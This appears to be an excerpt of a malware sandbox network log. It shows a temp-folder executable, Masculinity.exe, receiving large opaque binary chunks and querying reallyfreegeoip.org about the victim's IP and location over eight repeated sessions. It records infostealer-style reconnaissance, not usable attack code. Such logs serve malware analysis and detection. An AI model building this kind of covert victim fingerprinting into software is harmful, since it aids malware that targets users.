2024-07-25 08:05:10 UTC	8000	IN	Data Raw: 8a e6 ce 2d dd 75 76 f9 25 34 ba 1b fb 81 f2 66 3e cb 9c a0 e7 d4 a0 ec 00 b9 0e e6 9f bd 67 5a d0 35 e6 b1 be 5d 86 56 22 db 2c 1b c7 28 36 9e 12 2c 38 b0 70 3e 88 ee fd f3 b4 5f 79 87 80 07 b7 a4 87 ed ca c8 80 88 d7 a4 bb 48 11 8e ab 54 1a b1 b5 85 18 ae c2 58 48 cd a2 22 6b 34 11 45 c8 3f 7a 8a 67 b8 48 30 eb ba 95 43 1f b1 54 39 e6 5c ee 53 cc 68 4c 03 95 89 7a a8 2b a0 d2 c4 71 04 af 30 20 a4 41 b5 03 31 a0 8b 5f bb 21 01 06 6f 61 4d fd c1 0e 3f 49 18 20 74 87 2b 4b 21 e3 25 18 3c c0 79 ed bc 87 99 bf 95 02 d5 24 bc 1c f8 42 5a e2 b9 df f2 36 ea c5 6d e3 e2 f5 e8 d6 78 e3 da 4c 94 0f de ce ac d2 13 c1 fc bb a5 75 90 d6 a6 f8 a2 31 5f 1a ba 5a e1 42 f2 99 3c b9 0c 42 cc 1c 8a f8 59 20 65 ea 8b a4 1b e9 cd fa 00 51 fa 5f 7d 38 a7 a9 af e1 5f 6e c3 2f Data Ascii: -uv%4f>gZ5]V",(6,8p>_yHTXH"k4E?zgH0CT9\ShLz+q0 A1_!oaM?I t+K!%<y$BZ6mxLu1_ZB<BY eQ_}8_n/
2024-07-25 08:05:11 UTC	8000	IN	Data Raw: 37 4f a2 e3 78 3f 07 f9 a7 50 4f 97 07 4d 45 3b a7 a9 6d 3a 71 1c 2f 6d 2a e9 75 21 63 9e 4b 3b de ce 44 6b b8 04 fc 2b 1f 8f ea 74 57 d3 a4 9c ee 9f e2 d0 e5 34 97 fc 12 33 59 a6 5c 4c d0 0c 95 e5 bc d8 71 94 91 45 5c dc 95 3a 42 84 b1 87 a6 e8 43 52 e9 f3 65 45 4b 64 3c dc 4b 68 8f 3e 24 46 49 70 17 c6 dc fb 71 5c cc a7 46 15 65 8c 43 0e 0f 76 80 de 75 1a 60 cd 73 32 4a 39 7c 06 f6 f1 37 d1 46 16 ea c4 b1 45 d2 83 c3 24 d5 2b 74 51 5c cd ca 6a f9 69 cb ea 16 15 28 bf 22 27 d1 56 a6 36 50 7d 39 4e 1c 4a e7 b9 47 95 11 24 c8 df 8c 25 57 49 04 a0 8e 3c 81 d7 06 5f 6e 0f 43 d7 a5 2f 4c d8 92 e5 82 3f 35 f3 db 2c 79 08 d4 c5 73 6a 6e a7 04 5b 54 51 80 2d 81 8c 1e 79 9a 8d 2f 33 21 92 24 2e f6 48 8c 51 b9 27 47 de 2d bd 5c 5a 38 71 ea fa b5 cc 9a bc d1 d8 17 Data Ascii: 7Ox?POME;m:q/m*u!cK;Dk+tW43Y\LqE\:BCReEKd<Kh>$FIpq\FeCvu`s2J9\|7FE$+tQ\ji("'V6P}9NJG$%WI<_nC/L?5,ysjn[TQ-y/3!$.HQ'G-\Z8q
2024-07-25 08:05:11 UTC	8000	IN	Data Raw: f9 72 18 ba 1b 80 80 da 62 2e cb 9a cf 5f d4 a0 e7 74 77 0a e6 10 b7 4f 5e e9 35 e0 cf 43 42 9a 74 5f 25 2c 11 bf 89 78 b2 6d 03 7c b9 5c 31 94 e5 fb f0 a6 5e 6e 86 8b 00 8e eb 86 ee d9 ca e2 a7 ca a9 8d 53 08 f8 45 5f 21 ea da b2 1e b1 cd 50 28 89 85 31 6f 2d 0b b1 8c 13 0b 88 6b 9f 4b 01 fb ab 99 4d 37 ed 14 34 e6 3d 85 65 ed 46 5f 25 cc 89 76 c5 17 a8 df 9f 1e 3c a9 2f 56 ee 5a b6 24 3b f9 a9 79 c9 b0 71 2f 1d 6e 4a 10 d2 12 2e 41 6b 69 52 86 5b 2e 7a 04 3a 1e 5f ee 2a fc b4 ff d5 44 1d 72 ba 0d be 6e 17 75 4d 93 b3 0b 9e 3f 89 2e 5a f1 90 ff 30 b3 73 80 2a 7f af 0d 2b 56 c1 a2 3c 32 f9 aa a6 71 cc d4 a5 4a a2 9f 5d 1a ba 26 ec 52 fe 87 c8 64 4a 4f df 12 1e c6 cc d4 65 ec 8b 6b 54 a3 b9 ce 00 5b e1 40 53 2c a2 ba ae e3 5e 42 df 2c a8 d5 5c fa a8 b4 ca Data Ascii: rb._twO^5CBt_%,xm\|\1^nSE_!P(1o-kKM74=eF_%v</VZ$;yq/nJ.AkiR[.z:_DrnuM?.Z0s+V<2qJ]&RdJOekT[@S,^B,\
2024-07-25 08:05:11 UTC	8000	IN	Data Raw: f1 b6 5d 15 c0 4b 4d 33 47 82 ba 61 28 fd 79 72 60 4b ec 48 30 39 00 05 3b a4 b0 6b 06 e4 02 d4 7a 0e 83 c8 73 50 c2 a6 a7 fa 9d e2 d6 dd 29 86 dc ca 70 5f 84 57 4b bf 5a fa fe b7 f0 6d f9 8d 42 4f d0 bd 36 4b 09 f7 94 af f8 6f 50 65 be 45 4f 2a cc 0f 35 43 d9 a1 37 5d 99 79 58 93 64 f9 e8 71 5c 01 de 5c 67 6a ba 4a 56 b9 51 9b c9 63 bc 45 d1 01 0e 4d 39 24 50 d3 ec 2c d0 7f 09 99 dc f5 e7 87 f2 98 0b f2 2d 6b af 79 d2 c9 53 e9 c9 ee f3 0f 63 69 91 50 0d 72 7e a3 20 78 f6 2a 44 68 74 19 ba 52 80 69 56 80 df fc 39 ff e0 04 a0 80 3b 77 c3 8f 5d 63 6c 11 c7 a2 61 8d 0e ec 1a 82 35 fd 1d fd 5b 5e 04 c5 c3 4c 29 73 02 26 5b 54 5a 7b 3b f3 a5 46 79 ea 6e 16 24 28 30 01 36 84 46 c3 51 c9 e5 63 c7 3c ca ff 7f 22 13 d7 b5 b5 f9 38 99 cb d2 22 6a 4a eb 53 cd b7 95 Data Ascii: ]KM3Ga(yr`KH09;kzsP)p_WKZmBO6KoPeEO5C7]yXdq\\gjJVQcEM9$P,-kySciPr~ xDhtRiV9;w]cla5[^L)s&[TZ{;Fyn$(06FQc<"8"jJS
2024-07-25 08:05:11 UTC	8000	IN	Data Raw: d9 3d 2f ce e8 95 1b d4 d0 f0 47 c6 0e e6 9f a0 b1 5d 8f 26 ec cf 4f 71 cb 41 c0 64 2c 1b cc 01 28 c0 e9 4d 35 c9 fe 1e 89 ec 5f fd a8 2d 73 c3 80 77 15 81 9e ff dd 6e b4 96 ba 94 c4 5f 70 28 90 61 30 9f 17 b1 00 c3 8a 51 20 96 00 1b 1a 2b 1c 61 8c 19 63 bc 63 a7 6f 11 f6 83 d8 5c 3f 95 94 35 e6 4d ee 4c ef 57 5e 3f 12 8b 79 a6 02 9f d9 d1 c8 eb 54 d0 50 fd 80 ae 10 1b bf b5 5f c3 d3 10 06 37 0c 4c 03 dd c4 3f 49 33 4f 35 9a 2b 41 53 06 3a 18 5f e8 22 ed c2 8c 93 62 8c 03 d5 24 ac 6e 11 5d 1f 92 b3 00 96 06 9d 28 d1 e2 92 ff 0c a0 78 80 21 4c 88 57 c6 11 c1 d8 66 41 9e aa d0 71 c9 d4 a5 4a 80 8c 59 32 aa 34 e0 49 f9 94 0f 0a 58 42 ce 19 41 fb e6 20 63 e0 89 08 b6 81 e5 be 6f 77 f2 4c 7d 1e a8 d5 8f f2 58 44 c8 f6 90 c6 4a c1 5b 8c f4 a8 33 6e 14 44 95 b0 Data Ascii: =/G]&OqAd,(M5_-swn_p(a0Q +acco\?5MLW^?yTP_7L?I3O5+AS:_"b$n](x!LWfAqJY24IXBA cowL}XDJ[3nD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:22 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:22 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23445 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeGYV4P6Knzbu%2FwcLfCzNL7LAaJ3cqNzVQLbN1MinEh0mPS8w1XK2Yo2gRu%2FdEhlVaOsWX0XKpX7ErJmLcWIoZLKO0vT3uhYKXCMA1PqWHemdvhVOE9FQ4u0wPlkSaVFC6%2BhBU6Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa4feba9d7d06-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:24 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 08:05:24 UTC	700	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23447 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5ULRQbfWxi3JsLkYYPFbgejSuCV5EIATQVzkuxwG7FFzROA5VJtKyXF50iAU0QrgbG6R4fj34KcGmLKr9t5ebr92OQSGjEN2W90STh7LoYq6pnDzh5hWyW3FcZcmGae5X8doUlk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa50b8d7f1889-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49721	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:33 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23456 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xpp70vBpQcsZGuqv2vzrZVWs0IcT3QBwy5LKCxOEQ8y%2FwhimO61hTFgdvNWNGvMMXmu3hiyEJxmWRxBBqFWs7NjbucVWP2fGK3qjwD69phtQ1fvZEOLjVHDtJKq6n32WcOfFYOyh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa5432ecc78db-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:45 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:46 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23469 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2yddEvLKjp3lKp5c1NqZeou5DCY5STUA%2B2PZ%2FexIQPU2pH%2Fx8VADOz97s86WGq2sQymJpZfKSZbFBdPDc5PYBsLh04Ep2SgRgS%2Bm8OOr1v70RP5XkN6fi31wF5DMgVHONT1ev0%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa592c8e043b0-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49726	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:53 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:53 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:53 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23476 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YvX5SgbIotcDiEw7ktm6fpKAeUtvs0EUk2NRYmmSDivMUf103itglLTqZqIDrsTIC0lQ8oy7tO4ITWCw9GhXvyklxw1jhkykTll4Y34rSKcilahmsafL8GU8I6KHa0%2F3bBTRfX94"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa5c28d884345-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:53 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49728	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:57 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:57 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23480 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ajw7z5jckGHtSedJ%2FuikxUg09iHNU%2FHgGdDCLm61tSwatZtxy3MJA2JdzvS39edRAykcYPaDei2KdPL0X5PzHnmlOU3eHuMJ9rbma0R8mwOYY7I2vM%2FIPDTxqMZrRAMlLUDy8QHc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa5d948390c92-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:57 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49730	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:59 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:05:59 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:59 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23482 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKDBQdKQV62cjiLZ3HYNTmX3JGj7RfNhHntF9Sq6NE1FE%2B9iO%2BWJw6BsMQUzcBelJGN3ny98ZKeBCeERB%2BcDhnIG9OLHdnugBLQL9CATJ3rDeq5RdMIM%2FHnk%2B3U7bLCzMeFtMZAH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa5e86f524356-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:05:59 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:05:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49732	188.114.97.3	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:06:01 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 08:06:02 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:06:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 23485 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmDp9uyEVqk7FOo85OENMXEDXLyuKJtmxtQgIfB9JewDMCuHVjIkLSjK232%2BJ8N%2BLR39f9%2BJUq4z9k5sg9oT%2FzYD2mwJTS5amEpqlRHVDslM1dyHj%2Fd1seZx%2BRGvHvnI2pfUTqRK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8aa5f6ea9043e2-EWR alt-svc: h3=":443"; ma=86400
